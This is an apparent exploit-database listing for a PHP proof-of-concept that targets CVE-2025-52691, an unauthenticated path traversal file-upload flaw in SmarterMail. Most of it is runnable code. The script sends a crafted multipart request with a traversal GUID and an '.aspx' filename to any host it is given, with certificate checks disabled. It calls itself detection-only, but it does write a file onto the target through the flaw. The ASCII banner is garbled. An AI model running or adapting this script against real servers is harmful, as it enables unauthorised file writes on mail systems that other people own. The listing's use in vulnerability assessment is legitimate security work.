Share
## https://sploitus.com/exploit?id=PACKETSTORM:215889
=============================================================================================================================================
| # Title : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.smartertools.com/ |
=============================================================================================================================================
[+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail.
It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal
condition in the contextData GUID to determine whether the target is vulnerable.
The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable,
Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation.
It is intended solely for validation and security assessment purposes.
[+] POC : php poc.php -H https://target.com
<?php
error_reporting(E_ALL);
ini_set('display_errors', 0);
$banner = <<<BANNER
โโโโโโโ โโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโ โโโโโโ โโโ โโโโโโ
โโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโ
โโโโโโโโโ โโโโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโ
โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
โโโโโโ โโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโโโโโ โโโโโโ โโโโโโ โโโ
watchTowr-vs-SmarterMail-CVE-2025-52691.php
(*) CVE-2025-52691 Detection Artifact Generator
BANNER;
function generateRandomName(int $length = 6): string {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$out = '';
for ($i = 0; $i < $length; $i++) {
$out .= $chars[random_int(0, strlen($chars) - 1)];
}
return $out;
}
function dag(string $host): void {
$name = generateRandomName();
$url = $host . 'api/upload';
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));
$data = "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"context\"\r\n\r\nattachment\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"resumableIdentifier\"\r\n\r\nfakeID\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"resumableFilename\"\r\n\r\nfakefile.aspx\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"contextData\"\r\n\r\n";
$data .= "{\"guid\":\"dag/../../{$name}\"}\r\n";
$data .= "--{$boundary}\r\n";
$data .= "Content-Disposition: form-data; name=\"whatever\"; filename=\"fake.jpg\"\r\n\r\n";
$data .= "Detection Artifact Generator\r\n";
$data .= "--{$boundary}--\r\n";
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $data,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Content-Length: " . strlen($data)
],
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_TIMEOUT => 15,
]);
$response = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($response === false || empty($response)) {
echo "[!] Request failed\n";
return;
}
$json = json_decode($response, true);
if (is_string($json)) {
$json = json_decode($json, true);
}
if (!is_array($json)) {
echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
return;
}
if ($httpCode === 200 && isset($json['key'])) {
if (stripos($json['key'], $name) !== false) {
echo "[+] VULNERABLE - file " . basename($json['key']) . " got uploaded\n";
return;
}
}
if ($httpCode === 400 && ($json['message'] ?? '') === 'INVALID_GUID') {
echo "[-] NOT VULNERABLE - patch applied (INVALID_GUID)\n";
return;
}
echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
}
echo $banner;
$options = getopt("H:", ["host:"]);
if (!isset($options['H']) && !isset($options['host'])) {
echo "Usage : php poc.php -H <host>\n";
echo "Example: php poc.php -H https://smartermail.lab/\n";
exit(1);
}
$host = rtrim($options['H'] ?? $options['host'], '/') . '/';
dag($host);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================